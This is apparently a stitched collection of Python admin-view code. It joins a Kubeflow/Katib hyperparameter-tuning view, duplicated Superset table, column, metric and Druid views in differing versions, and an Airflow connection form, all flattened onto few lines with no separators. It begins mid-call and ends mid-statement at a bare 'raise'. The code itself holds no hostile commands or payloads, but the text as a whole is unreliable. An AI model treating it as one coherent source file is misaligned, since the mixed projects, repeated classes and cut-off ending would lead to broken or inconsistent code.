description='工作节点启动命令', widget=MyBS3TextAreaFieldWidget(), validators=[DataRequired()] ) self.edit_form_extra_fields['pytorch_worker_num'] = IntegerField( _(self.datamodel.obj.lab('pytorch_worker_num')), default=json.loads(hp.job_json).get('pytorch_worker_num', 3) if hp and hp.job_json else 3, description='工作节点数目', widget=BS3TextFieldWidget(), validators=[DataRequired()] ) self.edit_form_extra_fields['pytorch_worker_image'] = StringField( _(self.datamodel.obj.lab('pytorch_worker_image')), default=json.loads(hp.job_json).get('pytorch_worker_image',conf.get('KATIB_PYTORCHJOB_DEFAULT_IMAGE','')) if hp and hp.job_json else conf.get('KATIB_PYTORCHJOB_DEFAULT_IMAGE',''), description='工作节点镜像', widget=BS3TextFieldWidget(), validators=[DataRequired()] ) self.edit_form_extra_fields['pytorch_master_command'] = StringField( _(self.datamodel.obj.lab('pytorch_master_command')), default=json.loads(hp.job_json).get('pytorch_master_command', 'python xx.py') if hp and hp.job_json else 'python xx.py', description='master节点启动命令', widget=BS3TextFieldWidget(), validators=[DataRequired()] ) self.edit_form_extra_fields['pytorch_worker_command'] = StringField( _(self.datamodel.obj.lab('pytorch_worker_command')), default=json.loads(hp.job_json).get('pytorch_worker_command', 'python xx.py') if hp and hp.job_json else 'python xx.py', description='工作节点启动命令', widget=BS3TextFieldWidget(), validators=[DataRequired()] ) self.edit_columns = ['job_type','project','name','namespace','describe','parallel_trial_count','max_trial_count','max_failed_trial_count', 'objective_type','objective_goal','objective_metric_name','objective_additional_metric_names', 'algorithm_name','algorithm_setting','parameters_demo', 'parameters'] self.edit_fieldsets=[( lazy_gettext('common'), {"fields": copy.deepcopy(self.edit_columns), "expanded": True}, )] if job_type=='TFJob': group_columns = ['tf_worker_num','tf_worker_image','tf_worker_command'] self.edit_fieldsets.append(( lazy_gettext(job_type), {"fields":group_columns, "expanded": True}, ) ) for column in group_columns: self.edit_columns.append(column) if job_type=='Job': group_columns = ['job_worker_image','job_worker_command'] self.edit_fieldsets.append(( lazy_gettext(job_type), {"fields":group_columns, "expanded": True}, ) ) for column in group_columns: self.edit_columns.append(column) if job_type=='PyTorchJob': group_columns = ['pytorch_worker_num','pytorch_worker_image','pytorch_master_command','pytorch_worker_command'] self.edit_fieldsets.append(( lazy_gettext(job_type), {"fields":group_columns, "expanded": True}, ) ) for column in group_columns: self.edit_columns.append(column) if job_type=='XGBoostJob': group_columns = ['pytorchjob_worker_image','pytorchjob_worker_command'] self.edit_fieldsets.append(( lazy_gettext(job_type), {"fields":group_columns, "expanded": True}, ) ) for column in group_columns: self.edit_columns.append(column) task_column=['working_dir','volume_mount','node_selector','image_pull_policy','resource_memory','resource_cpu'] self.edit_fieldsets.append(( lazy_gettext('task args'), {"fields": task_column, "expanded": True}, )) for column in task_column: self.edit_columns.append(column) self.edit_fieldsets.append(( lazy_gettext('run experiment'), {"fields": ['alert_status'], "expanded": True}, )) self.edit_columns.append('alert_status') self.add_form_extra_fields = self.edit_form_extra_fields self.add_fieldsets = self.edit_fieldsets self.add_columns=self.edit_columns # 处理form请求 def process_form(self, form, is_created): # from flask_appbuilder.forms import DynamicForm if 'parameters_demo' in form._fields: del form._fields['parameters_demo'] # 不处理这个字段 # 生成实验 # @pysnooper.snoop() def make_experiment(self,item): # 搜索算法相关 algorithmsettings = [] for setting in item.algorithm_setting.strip().split(','): setting = setting.strip() if setting: key,value = setting.split('=')[0].strip(),setting.split('=')[1].strip() algorithmsettings.append(V1alpha3AlgorithmSetting(name=key,value=value)) algorithm = V1alpha3AlgorithmSpec( algorithm_name=item.algorithm_name, algorithm_settings=algorithmsettings if algorithmsettings else None ) # 实验结果度量,很多中搜集方式,这里不应该写死这个。 metrics_collector_spec=None if item.job_type=='TFJob': collector = V1alpha3CollectorSpec(kind="TensorFlowEvent") source = V1alpha3SourceSpec(V1alpha3FileSystemPath(kind="Directory", path="/train")) metrics_collector_spec = V1alpha3MetricsCollectorSpec( collector=collector, source=source) elif item.job_type=='Job': pass # 目标函数 objective = V1alpha3ObjectiveSpec( goal=item.objective_goal, objective_metric_name=item.objective_metric_name, type=item.objective_type) # 搜索参数 parameters=[] hp_parameters = json.loads(item.parameters) for parameter in hp_parameters: if hp_parameters[parameter]['type']=='int' or hp_parameters[parameter]['type']=='double': feasible_space = V1alpha3FeasibleSpace( min=str(hp_parameters[parameter]['min']), max=str(hp_parameters[parameter]['max']), step = str(hp_parameters[parameter].get('step','')) if hp_parameters[parameter].get('step','') else None) parameters.append(V1alpha3ParameterSpec( feasible_space=feasible_space, name=parameter, parameter_type=hp_parameters[parameter]['type'] )) elif hp_parameters[parameter]['type']=='categorical': feasible_space = V1alpha3FeasibleSpace(list=hp_parameters[parameter]['list']) parameters.append(V1alpha3ParameterSpec( feasible_space=feasible_space, name=parameter, parameter_type=hp_parameters[parameter]['type'] )) # 实验模板 go_template = V1alpha3GoTemplate( raw_template=item.trial_spec ) trial_template = V1alpha3TrialTemplate(go_template=go_template) labels = { "run-rtx":g.user.username, "hp-name":item.name, # "hp-describe": item.describe } # Experiment 跑实例测试 experiment = V1alpha3Experiment( api_version= conf.get('CRD_INFO')['experiment']['group']+"/"+ conf.get('CRD_INFO')['experiment']['version'] ,#"kubeflow.org/v1alpha3", kind="Experiment", metadata=V1ObjectMeta(name=item.name+"-"+uuid.uuid4().hex[:4], namespace=conf.get('KATIB_NAMESPACE'),labels=labels), spec=V1alpha3ExperimentSpec( algorithm=algorithm, max_failed_trial_count=item.max_failed_trial_count, max_trial_count=item.max_trial_count, metrics_collector_spec=metrics_collector_spec, objective=objective, parallel_trial_count=item.parallel_trial_count, parameters=parameters, trial_template=trial_template ) ) item.experiment = json.dumps(experiment.to_dict(),indent=4,ensure_ascii=False) @expose('/create_experiment/<id>',methods=['GET']) # @pysnooper.snoop(watch_explode=('hp',)) def create_experiment(self,id): hp = db.session.query(Hyperparameter_Tuning).filter(Hyperparameter_Tuning.id == int(id)).first() if hp: from myapp.utils.py.py_k8s import K8s k8s_client = K8s(hp.project.cluster.get('KUBECONFIG','')) namespace = conf.get('KATIB_NAMESPACE') crd_info =conf.get('CRD_INFO')['experiment'] print(hp.experiment) k8s_client.create_crd(group=crd_info['group'],version=crd_info['version'],plural=crd_info['plural'],namespace=namespace,body=hp.experiment) flash('部署完成','success') # kclient = kc.KatibClient() # kclient.create_experiment(hp, namespace=conf.get('KATIB_NAMESPACE')) self.update_redirect() return redirect(self.get_redirect()) # @pysnooper.snoop(watch_explode=()) def merge_trial_spec(self,item): image_secrets = conf.get('HUBSECRET',[]) user_hubsecrets = db.session.query(Repository.hubsecret).filter(Repository.created_by_fk == g.user.id).all() if user_hubsecrets: for hubsecret in user_hubsecrets: if hubsecret[0] not in image_secrets: image_secrets.append(hubsecret[0]) image_secrets = [ { "name": hubsecret } for hubsecret in image_secrets ] item.job_json={} if item.job_type=='TFJob': item.trial_spec=core.merge_tfjob_experiment_template( worker_num=item.tf_worker_num, node_selector=item.get_node_selector(), volume_mount=item.volume_mount, image=item.tf_worker_image, image_secrets = image_secrets, hostAliases=conf.get('HOSTALIASES',''), workingDir=item.working_dir, image_pull_policy=conf.get('IMAGE_PULL_POLICY','Always'), resource_memory=item.resource_memory, resource_cpu=item.resource_cpu, command=item.tf_worker_command ) item.job_json={ "tf_worker_num":item.tf_worker_num, "tf_worker_image": item.tf_worker_image, "tf_worker_command": item.tf_worker_command, } if item.job_type == 'Job': item.trial_spec=core.merge_job_experiment_template( node_selector=item.get_node_selector(), volume_mount=item.volume_mount, image=item.job_worker_image, image_secrets=image_secrets, hostAliases=conf.get('HOSTALIASES',''), workingDir=item.working_dir, image_pull_policy=conf.get('IMAGE_PULL_POLICY','Always'), resource_memory=item.resource_memory, resource_cpu=item.resource_cpu, command=item.job_worker_command ) item.job_json = { "job_worker_image": item.job_worker_image, "job_worker_command": item.job_worker_command, } if item.job_type == 'PyTorchJob': item.trial_spec=core.merge_pytorchjob_experiment_template( worker_num=item.pytorch_worker_num, node_selector=item.get_node_selector(), volume_mount=item.volume_mount, image=item.pytorch_worker_image, image_secrets=image_secrets, hostAliases=conf.get('HOSTALIASES', ''), workingDir=item.working_dir, image_pull_policy=conf.get('IMAGE_PULL_POLICY','Always'), resource_memory=item.resource_memory, resource_cpu=item.resource_cpu, master_command=item.pytorch_master_command, worker_command=item.pytorch_worker_command ) item.job_json = { "pytorch_worker_num":item.pytorch_worker_num, "pytorch_worker_image": item.pytorch_worker_image, "pytorch_master_command": item.pytorch_master_command, "pytorch_worker_command": item.pytorch_worker_command, } item.job_json = json.dumps(item.job_json,indent=4,ensure_ascii=False) # 检验参数是否有效 # @pysnooper.snoop() def validate_parameters(self,parameters,algorithm): try: parameters = json.loads(parameters) for parameter_name in parameters: parameter = parameters[parameter_name] if parameter['type'] == 'int' and 'min' in parameter and 'max' in parameter: parameter['min'] = int(parameter['min']) parameter['max'] = int(parameter['max']) if not parameter['max']>parameter['min']: raise Exception('min must lower than max') continue if parameter['type'] == 'double' and 'min' in parameter and 'max' in parameter: parameter['min'] = float(parameter['min']) parameter['max'] = float(parameter['max']) if not parameter['max']>parameter['min']: raise Exception('min must lower than max') if algorithm=='grid': parameter['step'] = float(parameter['step']) continue if parameter['type']=='categorical' and 'list' in parameter and type(parameter['list'])==list: continue raise MyappException('parameters type must in [int,double,categorical], and min\max\step\list should exist, and min must lower than max ') return json.dumps(parameters,indent=4,ensure_ascii=False) except Exception as e: print(e) raise MyappException('parameters not valid:'+str(e)) # @pysnooper.snoop() def pre_add(self, item): if item.job_type is None: raise MyappException("Job type is mandatory") core.validate_json(item.parameters) item.parameters = self.validate_parameters(item.parameters,item.algorithm_name) item.resource_memory=core.check_resource_memory(item.resource_memory,self.src_item_json.get('resource_memory',None) if self.src_item_json else None) item.resource_cpu = core.check_resource_cpu(item.resource_cpu,self.src_item_json.get('resource_cpu',None) if self.src_item_json else None) self.merge_trial_spec(item) self.make_experiment(item) def pre_update(self, item): self.pre_add(item) pre_add_get=set_column pre_update_get=set_column @action( "copy", __("Copy Hyperparameter Experiment"), confirmation=__('Copy Hyperparameter Experiment'), icon="fa-copy",multiple=True, single=False ) def copy(self, hps): if not isinstance(hps, list): hps = [hps] for hp in hps: new_hp = hp.clone() new_hp.name = new_hp.name+"-copy" new_hp.describe = new_hp.describe + "-copy" new_hp.created_on = datetime.datetime.now() new_hp.changed_on = datetime.datetime.now() db.session.add(new_hp) db.session.commit() return redirect(request.referrer)
class TableModelView( # pylint: disable=too-many-ancestors DatasourceModelView, DeleteMixin, YamlExportMixin): datamodel = SQLAInterface(models.SqlaTable) class_permission_name = "Dataset" method_permission_name = MODEL_VIEW_RW_METHOD_PERMISSION_MAP include_route_methods = RouteMethod.CRUD_SET list_title = _("Tables") show_title = _("Show Table") add_title = _("Import a table definition") edit_title = _("Edit Table") list_columns = ["link", "database_name", "changed_by_", "modified"] order_columns = ["modified"] add_columns = ["database", "schema", "table_name"] edit_columns = [ "table_name", "sql", "filter_select_enabled", "fetch_values_predicate", "database", "schema", "description", "owners", "main_dttm_col", "default_endpoint", "offset", "cache_timeout", "is_sqllab_view", "template_params", "extra", ] base_filters = [["id", DatasourceFilter, lambda: []]] show_columns = edit_columns + ["perm", "slices"] related_views = [ TableColumnInlineView, SqlMetricInlineView, ] base_order = ("changed_on", "desc") search_columns = ("database", "schema", "table_name", "owners", "is_sqllab_view") description_columns = { "slices": _("The list of charts associated with this table. By " "altering this datasource, you may change how these associated " "charts behave. " "Also note that charts need to point to a datasource, so " "this form will fail at saving if removing charts from a " "datasource. If you want to change the datasource for a chart, " "overwrite the chart from the 'explore view'"), "offset": _("Timezone offset (in hours) for this datasource"), "table_name": _("Name of the table that exists in the source database"), "schema": _("Schema, as used only in some databases like Postgres, Redshift " "and DB2"), "description": Markup( 'Supports <a href="https://daringfireball.net/projects/markdown/">' "markdown</a>"), "sql": _("This fields acts a Superset view, meaning that Superset will " "run a query against this string as a subquery."), "fetch_values_predicate": _("Predicate applied when fetching distinct value to " "populate the filter control component. Supports " "jinja template syntax. Applies only when " "`Enable Filter Select` is on."), "default_endpoint": _("Redirects to this endpoint when clicking on the table " "from the table list"), "filter_select_enabled": _("Whether to populate the filter's dropdown in the explore " "view's filter section with a list of distinct values fetched " "from the backend on the fly"), "is_sqllab_view": _("Whether the table was generated by the 'Visualize' flow " "in SQL Lab"), "template_params": _("A set of parameters that become available in the query using " "Jinja templating syntax"), "cache_timeout": _("Duration (in seconds) of the caching timeout for this table. " "A timeout of 0 indicates that the cache never expires. " "Note this defaults to the database timeout if undefined."), "extra": utils.markdown( "Extra data to specify table metadata. Currently supports " 'metadata of the format: `{ "certification": { "certified_by": ' '"Data Platform Team", "details": "This table is the source of truth." ' '}, "warning_markdown": "This is a warning." }`.', True, ), } label_columns = { "slices": _("Associated Charts"), "link": _("Table"), "changed_by_": _("Changed By"), "database": _("Database"), "database_name": _("Database"), "changed_on_": _("Last Changed"), "filter_select_enabled": _("Enable Filter Select"), "schema": _("Schema"), "default_endpoint": _("Default Endpoint"), "offset": _("Offset"), "cache_timeout": _("Cache Timeout"), "table_name": _("Table Name"), "fetch_values_predicate": _("Fetch Values Predicate"), "owners": _("Owners"), "main_dttm_col": _("Main Datetime Column"), "description": _("Description"), "is_sqllab_view": _("SQL Lab View"), "template_params": _("Template parameters"), "extra": _("Extra"), "modified": _("Modified"), } edit_form_extra_fields = { "database": QuerySelectField( "Database", query_factory=lambda: db.session.query(models.Database), widget=Select2Widget(extra_classes="readonly"), ) } def post_add( # pylint: disable=arguments-differ self, item: "TableModelView", flash_message: bool = True, fetch_metadata: bool = True, ) -> None: if fetch_metadata: item.fetch_metadata() create_table_permissions(item) if flash_message: flash( _("The table was created. " "As part of this two-phase configuration " "process, you should now click the edit button by " "the new table to configure it."), "info", ) def post_update(self, item: "TableModelView") -> None: self.post_add(item, flash_message=False, fetch_metadata=False) def _delete(self, pk: int) -> None: DeleteMixin._delete(self, pk) @expose("/edit/<pk>", methods=["GET", "POST"]) @has_access def edit(self, pk: str) -> FlaskResponse: """Simple hack to redirect to explore view after saving""" resp = super().edit(pk) if isinstance(resp, str): return resp return redirect("/superset/explore/table/{}/".format(pk)) @expose("/list/") @has_access def list(self) -> FlaskResponse: return super().render_app_template()
class TableColumnInlineView(CompactCRUDMixin, SupersetModelView): # noqa datamodel = SQLAInterface(models.TableColumn) list_title = _("Columns") show_title = _("Show Column") add_title = _("Add Column") edit_title = _("Edit Column") can_delete = False list_widget = ListWidgetWithCheckboxes edit_columns = [ "column_name", "verbose_name", "description", "type", "groupby", "filterable", "table", "expression", "is_dttm", "python_date_format", "database_expression", ] add_columns = edit_columns list_columns = [ "column_name", "verbose_name", "type", "groupby", "filterable", "is_dttm", ] page_size = 500 description_columns = { "is_dttm": _("Whether to make this column available as a " "[Time Granularity] option, column has to be DATETIME or " "DATETIME-like"), "filterable": _("Whether this column is exposed in the `Filters` section " "of the explore view."), "type": _("The data type that was inferred by the database. " "It may be necessary to input a type manually for " "expression-defined columns in some cases. In most case " "users should not need to alter this."), "expression": utils.markdown( "a valid, *non-aggregating* SQL expression as supported by the " "underlying backend. Example: `substr(name, 1, 1)`", True, ), "python_date_format": utils.markdown( Markup( "The pattern of timestamp format, use " '<a href="https://docs.python.org/2/library/' 'datetime.html#strftime-strptime-behavior">' "python datetime string pattern</a> " "expression. If time is stored in epoch " "format, put `epoch_s` or `epoch_ms`. Leave `Database Expression` " "below empty if timestamp is stored in " "String or Integer(epoch) type"), True, ), "database_expression": utils.markdown( "The database expression to cast internal datetime " "constants to database date/timestamp type according to the DBAPI. " "The expression should follow the pattern of " "%Y-%m-%d %H:%M:%S, based on different DBAPI. " "The string should be a python string formatter \n" "`Ex: TO_DATE('{}', 'YYYY-MM-DD HH24:MI:SS')` for Oracle " "Superset uses default expression based on DB URI if this " "field is blank.", True, ), } label_columns = { "column_name": _("Column"), "verbose_name": _("Verbose Name"), "description": _("Description"), "groupby": _("Groupable"), "filterable": _("Filterable"), "table": _("Table"), "expression": _("Expression"), "is_dttm": _("Is temporal"), "python_date_format": _("Datetime Format"), "database_expression": _("Database Expression"), "type": _("Type"), } add_form_extra_fields = { "table": QuerySelectField( "Table", query_factory=lambda: db.session().query(models.SqlaTable), allow_blank=True, widget=Select2Widget(extra_classes="readonly"), ) } edit_form_extra_fields = add_form_extra_fields
class TableColumnInlineView(CompactCRUDMixin, SupersetModelView): datamodel = SQLAInterface(models.TableColumn) # TODO TODO, review need for this on related_views class_permission_name = "Dataset" method_permission_name = MODEL_VIEW_RW_METHOD_PERMISSION_MAP include_route_methods = RouteMethod.RELATED_VIEW_SET | RouteMethod.API_SET list_title = _("Columns") show_title = _("Show Column") add_title = _("Add Column") edit_title = _("Edit Column") can_delete = False list_widget = ListWidgetWithCheckboxes edit_columns = [ "column_name", "verbose_name", "description", "type", "groupby", "filterable", "table", "expression", "is_dttm", "python_date_format", "extra", ] add_columns = edit_columns list_columns = [ "column_name", "verbose_name", "type", "groupby", "filterable", "is_dttm", ] page_size = 500 description_columns = { "is_dttm": _("Whether to make this column available as a " "[Time Granularity] option, column has to be DATETIME or " "DATETIME-like"), "filterable": _("Whether this column is exposed in the `Filters` section " "of the explore view."), "type": _("The data type that was inferred by the database. " "It may be necessary to input a type manually for " "expression-defined columns in some cases. In most case " "users should not need to alter this."), "expression": utils.markdown( "a valid, *non-aggregating* SQL expression as supported by the " "underlying backend. Example: `substr(name, 1, 1)`", True, ), "python_date_format": utils.markdown( Markup( "The pattern of timestamp format. For strings use " '<a href="https://docs.python.org/2/library/' 'datetime.html#strftime-strptime-behavior">' "python datetime string pattern</a> expression which needs to " 'adhere to the <a href="https://en.wikipedia.org/wiki/ISO_8601">' "ISO 8601</a> standard to ensure that the lexicographical ordering " "coincides with the chronological ordering. If the timestamp " "format does not adhere to the ISO 8601 standard you will need to " "define an expression and type for transforming the string into a " "date or timestamp. Note currently time zones are not supported. " "If time is stored in epoch format, put `epoch_s` or `epoch_ms`." "If no pattern is specified we fall back to using the optional " "defaults on a per database/column name level via the extra parameter." ""), True, ), "extra": utils.markdown( "Extra data to specify column metadata. Currently supports " 'certification data of the format: `{ "certification": "certified_by": ' '"Taylor Swift", "details": "This column is the source of truth." ' "} }`. This should be modified from the edit datasource model in " "Explore to ensure correct formatting.", True, ), } label_columns = { "column_name": _("Column"), "verbose_name": _("Verbose Name"), "description": _("Description"), "groupby": _("Groupable"), "filterable": _("Filterable"), "table": _("Table"), "expression": _("Expression"), "is_dttm": _("Is temporal"), "python_date_format": _("Datetime Format"), "type": _("Type"), } validators_columns = { "python_date_format": [ # Restrict viable values to epoch_s, epoch_ms, or a strftime format # which adhere's to the ISO 8601 format (without time zone). Regexp( re.compile( r""" ^( epoch_s|epoch_ms| (?P<date>%Y(-%m(-%d)?)?)([\sT](?P<time>%H(:%M(:%S(\.%f)?)?)?))? )$ """, re.VERBOSE, ), message=_("Invalid date/timestamp format"), ) ] } add_form_extra_fields = { "table": QuerySelectField( "Table", query_factory=lambda: db.session.query(models.SqlaTable), allow_blank=True, widget=Select2Widget(extra_classes="readonly"), ) } edit_form_extra_fields = add_form_extra_fields
class SqlMetricInlineView(CompactCRUDMixin, SupersetModelView): datamodel = SQLAInterface(models.SqlMetric) include_route_methods = RouteMethod.RELATED_VIEW_SET | RouteMethod.API_SET list_title = _("Metrics") show_title = _("Show Metric") add_title = _("Add Metric") edit_title = _("Edit Metric") list_columns = ["metric_name", "verbose_name", "metric_type"] edit_columns = [ "metric_name", "description", "verbose_name", "metric_type", "expression", "table", "d3format", "warning_text", ] description_columns = { "expression": utils.markdown( "a valid, *aggregating* SQL expression as supported by the " "underlying backend. Example: `count(DISTINCT userid)`", True, ), "d3format": utils.markdown( "d3 formatting string as defined [here]" "(https://github.com/d3/d3-format/blob/master/README.md#format). " "For instance, this default formatting applies in the Table " "visualization and allow for different metric to use different " "formats", True, ), } add_columns = edit_columns page_size = 500 label_columns = { "metric_name": _("Metric"), "description": _("Description"), "verbose_name": _("Verbose Name"), "metric_type": _("Type"), "expression": _("SQL Expression"), "table": _("Table"), "d3format": _("D3 Format"), "warning_text": _("Warning Message"), } add_form_extra_fields = { "table": QuerySelectField( "Table", query_factory=lambda: db.session().query(models.SqlaTable), allow_blank=True, widget=Select2Widget(extra_classes="readonly"), ) } edit_form_extra_fields = add_form_extra_fields
class ConnectionForm(DynamicForm): """Form for editing and adding Connection""" conn_id = StringField(lazy_gettext('Conn Id'), widget=BS3TextFieldWidget()) conn_type = SelectField( lazy_gettext('Conn Type'), choices=sorted(_connection_types, key=itemgetter(1)), # pylint: disable=protected-access widget=Select2Widget()) host = StringField(lazy_gettext('Host'), widget=BS3TextFieldWidget()) schema = StringField(lazy_gettext('Schema'), widget=BS3TextFieldWidget()) login = StringField(lazy_gettext('Login'), widget=BS3TextFieldWidget()) password = PasswordField(lazy_gettext('Password'), widget=BS3PasswordFieldWidget()) port = IntegerField(lazy_gettext('Port'), validators=[Optional()], widget=BS3TextFieldWidget()) extra = TextAreaField(lazy_gettext('Extra'), widget=BS3TextAreaFieldWidget()) # Used to customized the form, the forms elements get rendered # and results are stored in the extra field as json. All of these # need to be prefixed with extra__ and then the conn_type ___ as in # extra__{conn_type}__name. You can also hide form elements and rename # others from the connection_form.js file extra__jdbc__drv_path = StringField(lazy_gettext('Driver Path'), widget=BS3TextFieldWidget()) extra__jdbc__drv_clsname = StringField(lazy_gettext('Driver Class'), widget=BS3TextFieldWidget()) extra__google_cloud_platform__project = StringField( lazy_gettext('Project Id'), widget=BS3TextFieldWidget()) extra__google_cloud_platform__key_path = StringField( lazy_gettext('Keyfile Path'), widget=BS3TextFieldWidget()) extra__google_cloud_platform__keyfile_dict = PasswordField( lazy_gettext('Keyfile JSON'), widget=BS3PasswordFieldWidget()) extra__google_cloud_platform__scope = StringField( lazy_gettext('Scopes (comma separated)'), widget=BS3TextFieldWidget()) extra__google_cloud_platform__num_retries = IntegerField( lazy_gettext('Number of Retries'), validators=[NumberRange(min=0)], widget=BS3TextFieldWidget(), default=5) extra__grpc__auth_type = StringField(lazy_gettext('Grpc Auth Type'), widget=BS3TextFieldWidget()) extra__grpc__credential_pem_file = StringField( lazy_gettext('Credential Keyfile Path'), widget=BS3TextFieldWidget()) extra__grpc__scopes = StringField(lazy_gettext('Scopes (comma separated)'), widget=BS3TextFieldWidget()) extra__yandexcloud__service_account_json = PasswordField( lazy_gettext('Service account auth JSON'), widget=BS3PasswordFieldWidget(), description='Service account auth JSON. Looks like ' '{"id", "...", "service_account_id": "...", "private_key": "..."}. ' 'Will be used instead of OAuth token and SA JSON file path field if specified.', ) extra__yandexcloud__service_account_json_path = StringField( lazy_gettext('Service account auth JSON file path'), widget=BS3TextFieldWidget(), description= 'Service account auth JSON file path. File content looks like ' '{"id", "...", "service_account_id": "...", "private_key": "..."}. ' 'Will be used instead of OAuth token if specified.', ) extra__yandexcloud__oauth = PasswordField( lazy_gettext('OAuth Token'), widget=BS3PasswordFieldWidget(), description= 'User account OAuth token. Either this or service account JSON must be specified.', ) extra__yandexcloud__folder_id = StringField( lazy_gettext('Default folder ID'), widget=BS3TextFieldWidget(), description= 'Optional. This folder will be used to create all new clusters and nodes by default', ) extra__yandexcloud__public_ssh_key = StringField( lazy_gettext('Public SSH key'), widget=BS3TextFieldWidget(), description= 'Optional. This key will be placed to all created Compute nodes' 'to let you have a root shell there', ) extra__kubernetes__in_cluster = BooleanField( lazy_gettext('In cluster configuration')) extra__kubernetes__kube_config_path = StringField( lazy_gettext('Kube config path'), widget=BS3TextFieldWidget()) extra__kubernetes__kube_config = StringField( lazy_gettext('Kube config (JSON format)'), widget=BS3TextFieldWidget()) extra__kubernetes__namespace = StringField(lazy_gettext('Namespace'), widget=BS3TextFieldWidget())
class TableModelView(DatasourceModelView, DeleteMixin, YamlExportMixin): datamodel = SQLAInterface(models.SqlaTable) include_route_methods = RouteMethod.CRUD_SET list_title = _("Tables") show_title = _("Show Table") add_title = _("Import a table definition") edit_title = _("Edit Table") list_columns = ["link", "database_name", "changed_by_", "modified"] order_columns = ["modified"] add_columns = ["database", "schema", "table_name"] edit_columns = [ "table_name", "sql", "filter_select_enabled", "fetch_values_predicate", "database", "schema", "description", "owners", "main_dttm_col", "default_endpoint", "offset", "cache_timeout", "is_sqllab_view", "template_params", ] base_filters = [["id", DatasourceFilter, lambda: []]] show_columns = edit_columns + ["perm", "slices"] related_views = [ TableColumnInlineView, SqlMetricInlineView, RowLevelSecurityFiltersModelView, ] base_order = ("changed_on", "desc") search_columns = ("database", "schema", "table_name", "owners", "is_sqllab_view") description_columns = { "slices": _("The list of charts associated with this table. By " "altering this datasource, you may change how these associated " "charts behave. " "Also note that charts need to point to a datasource, so " "this form will fail at saving if removing charts from a " "datasource. If you want to change the datasource for a chart, " "overwrite the chart from the 'explore view'"), "offset": _("Timezone offset (in hours) for this datasource"), "table_name": _("Name of the table that exists in the source database"), "schema": _("Schema, as used only in some databases like Postgres, Redshift " "and DB2"), "description": Markup( 'Supports <a href="https://daringfireball.net/projects/markdown/">' "markdown</a>"), "sql": _("This fields acts a Superset view, meaning that Superset will " "run a query against this string as a subquery."), "fetch_values_predicate": _("Predicate applied when fetching distinct value to " "populate the filter control component. Supports " "jinja template syntax. Applies only when " "`Enable Filter Select` is on."), "default_endpoint": _("Redirects to this endpoint when clicking on the table " "from the table list"), "filter_select_enabled": _("Whether to populate the filter's dropdown in the explore " "view's filter section with a list of distinct values fetched " "from the backend on the fly"), "is_sqllab_view": _("Whether the table was generated by the 'Visualize' flow " "in SQL Lab"), "template_params": _("A set of parameters that become available in the query using " "Jinja templating syntax"), "cache_timeout": _("Duration (in seconds) of the caching timeout for this table. " "A timeout of 0 indicates that the cache never expires. " "Note this defaults to the database timeout if undefined."), } label_columns = { "slices": _("Associated Charts"), "link": _("Table"), "changed_by_": _("Changed By"), "database": _("Database"), "database_name": _("Database"), "changed_on_": _("Last Changed"), "filter_select_enabled": _("Enable Filter Select"), "schema": _("Schema"), "default_endpoint": _("Default Endpoint"), "offset": _("Offset"), "cache_timeout": _("Cache Timeout"), "table_name": _("Table Name"), "fetch_values_predicate": _("Fetch Values Predicate"), "owners": _("Owners"), "main_dttm_col": _("Main Datetime Column"), "description": _("Description"), "is_sqllab_view": _("SQL Lab View"), "template_params": _("Template parameters"), "modified": _("Modified"), } edit_form_extra_fields = { "database": QuerySelectField( "Database", query_factory=lambda: db.session().query(models.Database), widget=Select2Widget(extra_classes="readonly"), ) } def pre_add(self, table): with db.session.no_autoflush: table_query = db.session.query(models.SqlaTable).filter( models.SqlaTable.table_name == table.table_name, models.SqlaTable.schema == table.schema, models.SqlaTable.database_id == table.database.id, ) if db.session.query(table_query.exists()).scalar(): raise Exception(get_datasource_exist_error_msg( table.full_name)) # Fail before adding if the table can't be found try: table.get_sqla_table_object() except Exception as e: logger.exception(f"Got an error in pre_add for {table.name}") raise Exception( _("Table [{}] could not be found, " "please double check your " "database connection, schema, and " "table name, error: {}").format(table.name, str(e))) def post_add(self, table, flash_message=True): table.fetch_metadata() security_manager.add_permission_view_menu("datasource_access", table.get_perm()) if table.schema: security_manager.add_permission_view_menu("schema_access", table.schema_perm) if flash_message: flash( _("The table was created. " "As part of this two-phase configuration " "process, you should now click the edit button by " "the new table to configure it."), "info", ) def post_update(self, table): self.post_add(table, flash_message=False) def _delete(self, pk): DeleteMixin._delete(self, pk) @expose("/edit/<pk>", methods=["GET", "POST"]) @has_access def edit(self, pk): """Simple hack to redirect to explore view after saving""" resp = super(TableModelView, self).edit(pk) if isinstance(resp, str): return resp return redirect("/superset/explore/table/{}/".format(pk)) @action("refresh", __("Refresh Metadata"), __("Refresh column metadata"), "fa-refresh") def refresh(self, tables): if not isinstance(tables, list): tables = [tables] successes = [] failures = [] for t in tables: try: t.fetch_metadata() successes.append(t) except Exception: failures.append(t) if len(successes) > 0: success_msg = _( "Metadata refreshed for the following table(s): %(tables)s", tables=", ".join([t.table_name for t in successes]), ) flash(success_msg, "info") if len(failures) > 0: failure_msg = _( "Unable to retrieve metadata for the following table(s): %(tables)s", tables=", ".join([t.table_name for t in failures]), ) flash(failure_msg, "danger") return redirect("/tablemodelview/list/")
class DruidColumnInlineView(CompactCRUDMixin, SupersetModelView): datamodel = SQLAInterface(models.DruidColumn) include_route_methods = RouteMethod.RELATED_VIEW_SET list_title = _("Columns") show_title = _("Show Druid Column") add_title = _("Add Druid Column") edit_title = _("Edit Druid Column") list_widget = ListWidgetWithCheckboxes edit_columns = [ "column_name", "verbose_name", "description", "dimension_spec_json", "datasource", "groupby", "filterable", ] add_columns = edit_columns list_columns = ["column_name", "verbose_name", "type", "groupby", "filterable"] can_delete = False page_size = 500 label_columns = { "column_name": _("Column"), "type": _("Type"), "datasource": _("Datasource"), "groupby": _("Groupable"), "filterable": _("Filterable"), } description_columns = { "filterable": _( "Whether this column is exposed in the `Filters` section " "of the explore view." ), "dimension_spec_json": utils.markdown( "this field can be used to specify " "a `dimensionSpec` as documented [here]" "(http://druid.io/docs/latest/querying/dimensionspecs.html). " "Make sure to input valid JSON and that the " "`outputName` matches the `column_name` defined " "above.", True, ), } add_form_extra_fields = { "datasource": QuerySelectField( "Datasource", query_factory=lambda: db.session.query(models.DruidDatasource), allow_blank=True, widget=Select2Widget(extra_classes="readonly"), ) } edit_form_extra_fields = add_form_extra_fields def pre_update(self, item: "DruidColumnInlineView") -> None: # If a dimension spec JSON is given, ensure that it is # valid JSON and that `outputName` is specified if item.dimension_spec_json: try: dimension_spec = json.loads(item.dimension_spec_json) except ValueError as ex: raise ValueError("Invalid Dimension Spec JSON: " + str(ex)) if not isinstance(dimension_spec, dict): raise ValueError("Dimension Spec must be a JSON object") if "outputName" not in dimension_spec: raise 